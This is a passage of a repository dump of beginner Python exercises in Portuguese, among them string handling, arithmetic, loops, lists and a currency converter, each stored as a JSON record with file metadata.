"max_line_length": 63,
"num_lines": 4,
"path": "/EX 027_Primeiro_e_ultimo_nome_de_uma_pessoas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "nome = str(input(\"Digite seu nome completo: \")).strip().split()\nprint(\"E um prazer te conhecer....\")\nprint(f\"Seu primeiro nome e {nome[0]}\")\nprint(f'Seu ultimo nome e {nome[-1]}')\n"
},
{
"alpha_fraction": 0.650943398475647,
"alphanum_fraction": 0.6603773832321167,
"avg_line_length": 36.411766052246094,
"blob_id": "a567ddfcf1cd453fb51ab5f23e1497e639093217",
"content_id": "1aefdf4e0375a78d9228dc4c133e8318f8eda0e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 643,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 17,
"path": "/EX 092_Cadastro de Trabalhador em Python.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\ntrabalhador = dict()\n\n\ntrabalhador['Nome'] = str(input(\"Digite seu nome : \"))\nnasc = int(input(\"Digite o ano de nascimento :\"))\ntrabalhador['idade'] = datetime.now().year - nasc\ntrabalhador['CTPS'] = int(input('Digite o numero da CTPS (0 não tem) : '))\nif trabalhador['CTPS'] != 0:\n trabalhador['contratação'] = int(input(\"Ano de contração : \"))\n trabalhador['Salario'] = float(input(\"Salario R$\"))\n trabalhador['Aposentadoria'] = trabalhador['idade'] + ((trabalhador['contratação'] + 35) - datetime.now().year)\n\nprint('X' * 25)\n\nfor k, v in trabalhador.items():\n print(f'{k} tem o valor {v}')\n"
},
{
"alpha_fraction": 0.591549277305603,
"alphanum_fraction": 0.6056337952613831,
"avg_line_length": 27.600000381469727,
"blob_id": "eb6deac7e7dbfe91b4e733b6bd5e1b1c6ad61472",
"content_id": "4694943308e8d5b80063cfb1407e417e6f487994",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 5,
"path": "/EX 030_Par_ou_impar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = int(input(\"Digite um numero qualquer: \"))\nif num % 2 == 0:\n print(f\"O numero {num} e PAR\")\nelse:\n print(f\"O numero {num} e IMPAR\")"
},
{
"alpha_fraction": 0.6434977650642395,
"alphanum_fraction": 0.6928251385688782,
"avg_line_length": 48.66666793823242,
"blob_id": "5259e9f818f92921ed979576546f5069439a1761",
"content_id": "9918a2a665de9f32155a5f2640faf326985ea793",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 9,
"path": "/EX 034_Aumento_de_multiplos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "salario = float(input(\"Digite o salario do funcionario R$ \"))\nif salario <= 1250:\n novosalario = salario + (salario * 15 / 100)\n print(f\"O salario do funcionario que era R$ {salario} depois do aumento de 15% ficara {novosalario}\")\nelif salario > 1250:\n novosalario = salario + (salario * 10 / 100)\n print(f\"O salario do funcionario que era R$ {salario} depois do aumento de 10% ficara {novosalario}\")\nelse:\n print(\"Valor invalido\")"
},
{
"alpha_fraction": 0.5761317014694214,
"alphanum_fraction": 0.6213991641998291,
"avg_line_length": 33.85714340209961,
"blob_id": "9104355d2f88d929abb9dbde476e9189adc88223",
"content_id": "eb9541df0acf7ec005093719319644e1499b4d29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 7,
"path": "/EX 064_Tratando_vários_valores _v1.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = cont = 0\nnum = float(input(\"Digite um numero e [999] para PARAR: \"))\nwhile num != 999:\n soma += num\n cont += 1\n num = float(input(\"Digite um numero e [999] para PARAR: \"))\nprint(f\"Voce digitou {cont} numeros e a soma e {soma}\")"
},
{
"alpha_fraction": 0.6132478713989258,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 28.3125,
"blob_id": "92ed339282ad3c523b7c96ac40613dd4c585a88a",
"content_id": "439429d15231e5370ef608830699f656ceda95f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 16,
"path": "/EX 033_Maior_e_meno_ valores.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num1 = float(input(\"Primeiro numero: \"))\nnum2 = float(input(\"Segundo numero: \"))\nnum3 = float(input(\"Terceiro numero: \"))\n#verificando quem e menor\nmenor = num1\nif num2 < num1 and num2 < num3:\n menor = num2\nelif num3 < num1 and num3 < num2:\n menor = num3 \nprint(f\"O menor valor digitado foi {menor}\")\nmaior = num1\nif num2 > num1 and num2 > num3:\n maior = num2\nelif num3 > num1 and num3 > num2:\n maior = num3 \nprint(f\"O maior valor digitado foi {maior}\")"
},
{
"alpha_fraction": 0.5457627177238464,
"alphanum_fraction": 0.5966101884841919,
"avg_line_length": 33.764705657958984,
"blob_id": "e4af845e3d75b2aa13ead5b0c55428e7253f9862",
"content_id": "2d8b9bfcec698c120b2979681c5260f0facd517a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 590,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/EX 042_Analisando_Triângulos_v2.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "print(\"-=-\" * 20)\nprint(\"Analisado de triangulos:\")\nprint(\"-=-\" * 20)\nr1 = float(input(\"Primeiro seguimento: \"))\nr2 = float(input(\"Segundo seguimento: \"))\nr3 = float(input(\"Terceiro seguimento: \"))\n \nif r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:\n print(f\"Os segmentos {r1}, {r2}, {r3} PODEM FORMA TRIANGULO6\")\n if r1 == r2 == r3:\n print(f\"E o triangulo e EQUILATERO\")\n elif r1 != r2 != r3 != r1:\n print(f\"E o triangulo e ESCALENO\")\n else:\n print(f\"E o triangulo e ISOSCELES\")\nelse:\n print(f\"Os segmentos {r1}, {r2}, {r3} NAO PODEM FORMA TRIANGULO\")"
},
{
"alpha_fraction": 0.5136363506317139,
"alphanum_fraction": 0.5409091114997864,
"avg_line_length": 29.85714340209961,
"blob_id": "11875864ed992370f35f0f446508275e61118a16",
"content_id": "83c16f0b1c82850ea1ac3f4da7a23618441355ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 7,
"path": "/EX 050_Soma_dos_pares.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = cont = 0\nfor c in range(0, 6):\n num = int(input(f\"Digite o {c} valor: \"))\n if num % 2 == 0:\n soma += num\n cont += 1\nprint(f\"Voce informou {cont} pares e a soma desses numeros foi {soma}\") \n\n\n\n"
},
{
"alpha_fraction": 0.6779661178588867,
"alphanum_fraction": 0.6779661178588867,
"avg_line_length": 58.5,
"blob_id": "ca4a18f3a765bf32caf46d2841ec5da4ee41926b",
"content_id": "3ef5a4c485428b0cb8952dd249a59d332bce1484",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 118,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 2,
"path": "/EX 026_Primeira_e_ultima_ocorrencia_de_uma_string.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "frase = str(input(\"Digite uma frase ?\")).upper().strip()\nprint(f'A letra A aparece {frase.count(\"A\")} vezes na frase')"
},
{
"alpha_fraction": 0.6882715821266174,
"alphanum_fraction": 0.7114197611808777,
"avg_line_length": 45.35714340209961,
"blob_id": "5a6f3eb6c40c277361f826f06dee6953e6e68d01",
"content_id": "d207e4473cceab1781436a7203d84032790350ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 653,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 14,
"path": "/EX 036_Aprovando_emprestimo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "emprestimo = float(input(\"Digite o valor do emprestimo: \"))\nrenda = float(input(\"Digite o seu salario: \"))\nanos = float(input(\"Digite em quantos anos você vai pagar: \"))\nparcelas = anos * 12\nprestação = emprestimo / parcelas\nminimo = renda * 30 /100 \nprint(f\"Para pagar um empretimo de R${emprestimo:.2f} em {anos:.0f} anos \")\nprint(f\"Tem que pagar {parcelas:.0f} X {prestação:.2f}\")\nprint(f\"E a parcela minima e {parcelas:.0f} X {minimo:.2f}\")\nif renda <= minimo:\n print(\"PARABENS SEU EMPRESTIMO FOI AUTORIZADO\")\nelse:\n print(\"INFELIZMENTE NAO PODEMOS AUTORIZAR SEU EMPRESTIMO NESSE MOMENTO\")\n print(\"Salario abaixo dos 30% autorizado\")"
},
{
"alpha_fraction": 0.6742424368858337,
"alphanum_fraction": 0.6868686676025391,
"avg_line_length": 42.88888931274414,
"blob_id": "d789e0d756d771b840fdeac9aa333b0570e0d8c2",
"content_id": "dcacdb63aa80f096743a96b15d5ebadfebd4d3de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 398,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 9,
"path": "/EX 029_Radar_eletronico.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "vel = int(input(\"Qual a velocidade do carro ? \"))\nvelMaxima = 80\nif vel > 80:\n print(f\"Sua velocidade atual e {vel}Km/h e voce esta acima de velocidade maxima que e {velMaxima}Km/h\")\n print(\"MULTADO\")\n print(f\"Tera que pagar um multa de R$ {(vel - velMaxima) * 7}\")\nelse:\n print(\"Sua velocidade esta dentro dos padroes de segurança\")\nprint(\"Tenha um bom dia! Dirija com segurança\")\n\n"
},
{
"alpha_fraction": 0.4435215890407562,
"alphanum_fraction": 0.5033222436904907,
"avg_line_length": 17.84375,
"blob_id": "201961e304060685bf5b6b6c32ba4961ce5bab98",
"content_id": "5c280f2cde4cff626a8c59399d550ec734d60219",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 604,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 32,
"path": "/EX 106_Interactive helping system in Python.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "cores = ('\\33[m',\n '\\33[0;40;41m',\n '\\33[0;30;46m',\n '\\33[0;35;43m',\n '\\33[0;43;47m',);\n\n\n\ndef ajuda(com):\n titulo(f'Acessando manual de comandos \\'{com}\\'', 4)\n help(com)\n\n\ndef titulo(msg, cor=0):\n tam = len(msg) + 4\n print(cores[cor], end='')\n print('~' * tam)\n print(f' {msg}')\n print('~' * tam)\n print(cores[0], end='')\n\n\ncomando = \"\"\nwhile True:\n titulo('Sistema de ajuda PYHelp', 1)\n comando = str(input('Função ou Biblioteca > '))\n\n if comando.upper() == 'FIM':\n break\n else:\n ajuda(comando)\ntitulo('Ate Logo',1)"
},
{
"alpha_fraction": 0.6775362491607666,
"alphanum_fraction": 0.6847826242446899,
"avg_line_length": 38.14285659790039,
"blob_id": "238f34645437a72ed0c049c4528eb30b9e4f2e34",
"content_id": "9590ff62925f92b444f627fb422b24cac9578231",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 7,
"path": "/EX 007_Media_aritimetica.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "notas = []\nquantidade = int(input(\"Quantas notas deseja adicionar:\"))\nfor c in range(0, quantidade):\n notas.append(float(input(f'Digite a nota {c+1}:')))\nsoma = sum(notas)\nprint(f'A soma total das notas e {soma}')\nprint(f'A nota media desse aluno e {soma / quantidade}')\n\n\n"
},
{
"alpha_fraction": 0.5235571265220642,
"alphanum_fraction": 0.5365135669708252,
"avg_line_length": 26.8360652923584,
"blob_id": "47a7dc4a500b16ca83213855d23f50c1064d5613",
"content_id": "7b1494bb013d6e6607594a7bb27517df3cf9c70a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 61,
"path": "/EX 009_Tabuada.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def soma():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f\"{num} + {c} = {num + c}\")\n print(\"\\n\\n\")\n\n\ndef subtracao():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n print(\"\\n\\n\")\n\n\ndef multiplicacao():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} X {c} = {num * c}')\n print(\"\\n\\n\")\n\n\ndef todos():\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f\"{num} + {c} = {num + c}\")\n print(\"\\n\")\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n print(\"\\n\")\n for c in range(posicaoInicial, posicaoFinal + 1):\n print(f'{num} - {c} = {num - c}')\n\n\nwhile True:\n num = int(input('Digite aqui o numero que voce que ver a tabuada: '))\n posicaoInicial = int(input('Em que numero deseja iniciar a conta: '))\n posicaoFinal = int(input(\"Em que numero deseja terminar: \"))\n if posicaoFinal <= posicaoFinal:\n while posicaoFinal <= posicaoInicial:\n print(\"Numero final menor ou igual a numero inicial: \")\n posicaoFinal = int(input(\"Em que numero deseja terminar: \"))\n\n print('I-I' * 10)\n print('I-I' * 3, 'OPERADORES', 'I-I' * 3)\n print('I-I' * 10)\n print('( 1 ) SOMA\\n'\n '( 2 ) SUBTRAÇÃO\\n'\n '( 3 ) MULTIPLICAÇÃO\\n'''\n '( 4 ) TODOS\\n'\n '( 5 ) SAIR')\n\n opcao = int(input('Qual OPÇÃO vai usar ?'))\n\n if opcao == 1:\n soma()\n elif opcao == 2:\n subtracao()\n elif opcao == 3:\n multiplicacao()\n elif opcao == 4:\n todos()\n elif opcao == 5:\n break\n else:\n print(\"Opção invalida\")\n"
},
{
"alpha_fraction": 0.6769230961799622,
"alphanum_fraction": 0.6807692050933838,
"avg_line_length": 28,
"blob_id": "1688e15eb29117efd9e0931987d86e50ca5c26b8",
"content_id": "d61058f52393c805fd48c7811af7f4ff723422a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 9,
"path": "/EX 053_Detector_de_Palíndromo_sem _for.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "frase = str(input(\"Digite uma frase: \")).upper().strip()\npalavras = frase.split()\njunto= \"\".join(palavras)\ninverso = junto[::-1]\nprint(junto, inverso)\nif inverso == junto:\n print(\"Temos um palindromo\")\nelse:\n print(\"A frase digitada nao e um palindromo\")"
},
{
"alpha_fraction": 0.7164179086685181,
"alphanum_fraction": 0.7164179086685181,
"avg_line_length": 44,
"blob_id": "6e89ec7fc7e5dd1a187bd540d575b51bbc39299a",
"content_id": "256fb30f9c47539a8b681259051ce91ae6ffeecd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 3,
"path": "/EX 016_Quebrando_Numero.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from math import trunc\nnum = float(input('Digite um valor: '))\nprint(f'O valor digitado foi {num} e sua parte inteira e {trunc(num)}')"
},
{
"alpha_fraction": 0.7630331516265869,
"alphanum_fraction": 0.7630331516265869,
"avg_line_length": 45.88888931274414,
"blob_id": "597f39607e94b4c0ce24d56a20f9f379d5b53665",
"content_id": "395ba2e392ca90ad446e0d39f1752c505d45f21d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 422,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/EX 018_Seno_Casseno_Tangente.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "#import math\nfrom math import sin, cos, tan, radians\nanguloqualquer = float(input('digite um angulo: '))\nseno = sin(radians(anguloqualquer))\nprint(f'o angulo qualquer {anguloqualquer} tem o seno {seno} ')\ncosseno = cos(radians(anguloqualquer))\nprint(f'o angulo qualquer {anguloqualquer} tem o cosseno {cosseno}')\ntangente = tan(radians(anguloqualquer))\nprint(f'o anglo quaquer {anguloqualquer} tem a tangente {tangente}')\n"
},
{
"alpha_fraction": 0.6330274939537048,
"alphanum_fraction": 0.6513761281967163,
"avg_line_length": 35.66666793823242,
"blob_id": "516e154e480033d5908143213c38e50334bc695f",
"content_id": "af3461f2fdf1a423d74e1dc2684a4da4230a8fa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 109,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 3,
"path": "/EX 005_Antescessor_e_sucessor.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = int(input('Digite um numero:'))\nprint(f'Seu sucessor e {num + 1}')\nprint(f'Seu antecessor e {num - 1}')"
},
{
"alpha_fraction": 0.5562015771865845,
"alphanum_fraction": 0.5775193572044373,
"avg_line_length": 20.375,
"blob_id": "7441d3ae77b90a67b8bf1f1bd97b70f41eca86fc",
"content_id": "b47b07ab0105db7ee6f28c71053fa6ad623ffc3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 516,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 24,
"path": "/EX 100_Funções para sortear e somar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\ndef sorteia(lista):\n print(f'Sorteando 5 valores da lista: ', end='')\n for cont in range(0,5):\n n = randint(1,10)\n lista.append(n)\n print(f'{n}', end =' ', flush= True)\n sleep(0.6)\n print('Pronto')\n\ndef somaPar(lista):\n soma = 0\n for valor in lista:\n if valor % 2 == 0:\n soma += valor\n print(f'Somando os valores pares de {lista}, temos {soma}')\n\n\nnumero = list()\n\nsorteia(numero)\nsomaPar(numero)\n\n\n\n"
},
{
"alpha_fraction": 0.49674901366233826,
"alphanum_fraction": 0.5292587876319885,
"avg_line_length": 31.04166603088379,
"blob_id": "7201cf00facfba7207d1f3150cad66b881220a84",
"content_id": "8c3da9f83414d55506cffcb128956f3bdea464ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 24,
"path": "/EX 069_Análise_de_dados_do_grupo.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "contM = contF20 = tot18 = contF=0\nwhile True:\n idade = (int(input(\"Idade: \")))\n sexo = \" \"\n while sexo not in \"MF\":\n sexo = str(input(\"Sexo: \")).strip().upper()[0]\n if idade >= 18:\n tot18 = 1\n if sexo == \"M\":\n contM += 1\n if sexo == \"F\" and idade < 20:\n contF20+= 1\n if sexo == 'F':\n contF += 1\n opc = \" \"\n while opc not in 'SN':\n opc = str(input(\"Quer continuar? [S/N]\")).strip().upper()[0]\n if opc == \"N\":\n break\nprint(\"Acabou\")\nprint(f'Total de pessoas com mais de 18 anos {tot}')\nprint(f\"Temos um total de {contM} homens\")\nprint(f\"Temos um total de {contF20} de mulheres com menos de 20 anos \")\nprint(f'Temos um total de {contF} de mulheres cadstradas')\n"
},
{
"alpha_fraction": 0.6965944170951843,
"alphanum_fraction": 0.6965944170951843,
"avg_line_length": 39.5,
"blob_id": "132c82863111bcf493be5ac4301a58213eb3fc3a",
"content_id": "ee789458c4dfcf7f9e3ef03faf88d46d60c56e1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/EX 004_Dissecando_uma_Variavel.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "algo = input(\"Digite algo ?\")\nprint(f'O seu tipo e {type(algo)}')\nprint(f'E numerico? {algo.isalnum()}')\nprint(f'E alphanumerico {algo.isalpha()}')\nprint(f'Esta em maiusculas {algo.isupper()}')\nprint(f'Esta em minuscula {algo.islower()}')\nprint(f'Esta caqpitalizado {algo.istitle()}')\nprint(f'Tem espaços {algo.isspace()}')"
},
{
"alpha_fraction": 0.6709265112876892,
"alphanum_fraction": 0.6837060451507568,
"avg_line_length": 26.217391967773438,
"blob_id": "18be34dc2c9de6615f7e13c76a564dbf1e1288a6",
"content_id": "042719acc096d183abb06bcbca827f195ef8a78d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 638,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 23,
"path": "/EX 041_Classificando_Atletas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\n\nanoAtual = date.today().year\n\nidade = int(input(\"Digite o ano do ser nacscimento: \"))\n\nidadeAtual = anoAtual - idade\n\nif idadeAtual <= 9:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: MIRIM\")\nelif idadeAtual <= 14:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: INFANTIL\")\nelif idadeAtual <= 19:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: JÚNIOR\")\nelif idadeAtual <= 25:\n print(f\"Voce tem {idadeAtual} anos\")\n print(\"Classificação: SÊNIOR\")\nelse:\n print(f\"Voce tem {idadeAtual:.2f} anos\")\n print(\"Classificação: MASTER\")\n"
},
{
"alpha_fraction": 0.5574572086334229,
"alphanum_fraction": 0.5892420411109924,
"avg_line_length": 26.33333396911621,
"blob_id": "ff9cf349f6cb79d77ceea13459c838c53e96462b",
"content_id": "947b41552f118fa0f73c7a14a9d6cf4704853d51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 15,
"path": "/EX 085_Listas com pares e ímpares.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = [[], []]\nvalor = 0\nqtd = int(input(\"Quantas numeros deseja cadastrar ? \"))\nfor c in range(0, qtd):\n valor = (int(input(f'Digite o {c + 1}: ')))\n if valor % 2 == 0:\n num[0].append(valor)\n else:\n num[1].append(valor)\nprint(\"X\" * 30)\nprint(f'{num}')\nnum[0].sort()\nnum[1].sort()\nprint(f'Os valores pares digitados foram {num[0]}')\nprint(f'Os valores impares digitados foram {num[1]}')"
},
{
"alpha_fraction": 0.545271635055542,
"alphanum_fraction": 0.5513078570365906,
"avg_line_length": 21.590909957885742,
"blob_id": "b3a2f02891dd6e566298abb9e029f0b7e8a53aae",
"content_id": "d4f28db3e1c7e9b1b446a1612a1f3a7ae5c68876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 22,
"path": "/EX 082_Dividindo_valores_em_várias_listas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = []\npares = []\nimpar = []\n\nwhile True:\n num = int(input('Digite um valor: '))\n lista.append(num)\n opc = str(input('Quer continuar [S/N]? ')).strip().upper()[0]\n if opc == 'S':\n continue\n elif opc == 'N':\n break\n else:\n print('Opção invalida')\nfor i, v in enumerate(lista):\n if v % 2 == 0:\n pares.append(v)\n else:\n impar.append(v)\nprint(f'Lista completa {lista}')\nprint(f'Lista de pares {pares}')\nprint(f'Lista de impares {impar}')\n"
},
{
"alpha_fraction": 0.7162162065505981,
"alphanum_fraction": 0.7207207083702087,
"avg_line_length": 26.875,
"blob_id": "5953f78d8d1457adf29980508a237764cd4e3860",
"content_id": "7e99f806ba6c4fddcdeb4906d549d99b084c1a48",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 8,
"path": "/EX 017_Cateto_Hipotenusa.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\n\ncateto_op = float(input(\"Qual comprimento cateto oposto ? \"))\ncateto_ad = float(input(\"Qual comprimento cateto adijacente ? \"))\n\nhi = math.hypot(cateto_op, cateto_ad)\n\nprint(f'A hipotenuza vai medir {hi:.2f}')"
},
{
"alpha_fraction": 0.5249999761581421,
"alphanum_fraction": 0.574999988079071,
"avg_line_length": 24.125,
"blob_id": "762f41fce463026c494b7d440f30eb6a1f77b3a4",
"content_id": "487dec313243ba0d35e7bdb0e67b785f9f54f34f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 200,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 8,
"path": "/EX 048_Soma_ímpares_múltiplos_de_três.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "soma = 0\ncont = 0\nfor c in range (0,501, 2):\n if c % 3 == 0:\n cont += 1\n soma += c \nprint(f\"A soma de todos os valores e {soma} \")\nprint(f\"A quantidade de numeros somados foram {cont}\")"
},
{
"alpha_fraction": 0.500544548034668,
"alphanum_fraction": 0.5604481101036072,
"avg_line_length": 38.18902587890625,
"blob_id": "36f0abdb41b1fd389cea54cb5b89ea5c4292c221",
"content_id": "8e236065bd375ab49d8e90be3b824278958b2cf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6432,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 164,
"path": "/EX 010_Coversor_de_moedas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "# dolar = (franco[1], euro[2], iene[3], rublo[4], real[5] )\nUSD = (1.09647, 1.18611, 0.00957115, 0.0130646, 0.184561)\n# franco = (dolar[1], euro[2], iene[3], rublo[4], real[5])\nCHF = (0.912088, 1.08190, 0.00872883, 0.0119166, 0.168380)\n# euro = (dolar[1], franco[2], iene[3], rublo[4], real[5])\nEUR = (0.843038, 0.924249, 0.00806778, 0.0110138, 0.155594)\n# iene = (dolar[1], franco[2], euro[3], rublo[4], real[5] )\nJPY = (104.493, 114.549, 123.939, 1.36509, 19.2881)\n# rublo (dolar[1], franco[2], euro[3], iene[4], real[5])\nRUB = (76.5400, 83.9150, 90.7922, 0.732615, 14.1297)\n# real = (dolar[1], franco[2], euro[3], iene[4], rublo[5])\nREAL = (5.41665, 5.93738, 6.43010, 0.0518823, 0.0708227)\n\n\ndef Dolar():\n if opc == 2:\n print(f'O valor em Franco {moeda} convertido para Dolar e {moeda * USD[0]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Dolar e {moeda * USD[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Dolar e {moeda * USD[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Dolar e {moeda * USD[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real{moeda} convertido para Dolar e {moeda * USD[4]:.2f}')\n\n\ndef Franco():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Franco e {moeda * CHF[0]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Franco e {moeda * CHF[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Franco e {moeda * CHF[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Franco e {moeda * CHF[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Franco e {moeda * CHF[4]:.2f}')\n\n\ndef Euro():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Euro e {moeda * EUR[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Euro e {moeda * EUR[1]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Euro e {moeda * EUR[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Euro e {moeda * EUR[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Euro e {moeda * EUR[4]:.2f}')\n\n\ndef Iene():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Iene e {moeda * JPY[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Iene e {moeda * JPY[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Iene e {moeda * JPY[2]:.2f}')\n elif opc == 5:\n print(f'O valor em Rublo {moeda} convertido para Iene e {moeda * JPY[3]:.2f}')\n elif opc == 6:\n print(f'O valor em Real {moeda} convertido para Iene e {moeda * JPY[4]:.2f}')\n\n\ndef Rublo():\n if opc == 1:\n print(f'O valor em Dolar {moeda} convertido para Rublo e {moeda * RUB[0]:.2f}')\n elif opc == 2:\n print(f'O valor em Franco {moeda} convertido para Rublo e{moeda * RUB[1]:.2f}')\n elif opc == 3:\n print(f'O valor em Euro {moeda} convertido para Rublo e {moeda * RUB[2]:.2f}')\n elif opc == 4:\n print(f'O valor em Iene {moeda} convertido para Rublo e {moeda * 